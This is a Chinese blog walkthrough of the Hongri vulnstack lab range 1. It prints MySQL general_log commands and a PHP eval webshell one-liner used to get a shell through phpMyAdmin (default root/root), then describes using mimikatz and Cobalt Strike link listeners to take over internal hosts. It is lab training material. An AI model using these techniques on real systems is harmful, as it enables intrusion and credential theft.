红日内网靶机一

拓朴图如下:

(win7为VM1(192.168.1.9、192.168.52.2),win2003为VM2(192.168.52.3,win2008为VM3(192.168.52.1))

image-20240107155602886

靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

外网打点

对web服务器进行端口扫描一波
image-20240107155612632发现存在80和3306端口,访问80端口如下
image-20240107155621032发现是phpstudy的一个探针,那么就有可能会有phpmyadmin的web管理界面,目录扫描一波
image-20240107155631862发现确实存在,访问看看
image-20240107155641332随手一个root/root就进去了,现在就是通过这玩意儿拿shell了
有兴趣的读者可以看看这篇关于phpmyadmin漏洞的总结文章:https://www.cnblogs.com/liliyuanshangcao/p/13815242.html#_label0_0
这里通过日志文件来进行拿shell

1
2
3
4
5
6
#开启日志记录:
set global general_log = "ON";
#查看当前的日志目录:
show variables like 'general%';
#指定日志文件
set global general_log_file = "指定日志文件的路径";

我们在前面通过phpstudy的探针可以知道网站的路径
image-20240107155650584
image-20240107155659302设置成功,写入代码

1
select "<?php eval($_POST['x']); ?>"

image-20240107155707463用蚁剑连接
image-20240107155720353我这里直接用蚁剑上线C2马子
image-20240107155729055内网渗透

这里直接就是管理员权限了
image-20240107155736518用mimikatz跑一波
image-20240107155745730查看网卡
image-20240107155753847看看内网存活有那些主机和端口情况
这里应因为内网机不出网,密码也跑出来,万事具备只欠东风了(这里图片挂掉了)

首先在已上线的机器上创建如下监听,监听端口可自定义。利用已上线的主机,将它做一个Listener,实现链路上线CobalStrike。

image-20240107155801514

生成payload载荷
image-20240107155809114这里选择我们刚刚创建的那个listener
image-20240107155817857将生成的载荷上传到目标机器,并执行
image-20240107155828131
image-20240107155836668
image-20240107155845217接下来就可以对其他的内网机进行上线了
image-20240107155855652
image-20240107155904156全部成功上线
image-20240107155914178因为这是link链接,只要主链路(即出网机Listener)掉线,就都会掉线!

内网安全
#内网安全 #靶机复现
红日内网靶机一
http://idea-oss.github.io/2022/06/15/红日内网靶机一/index/
作者
iDea
发布于
2022年6月15日
许可协议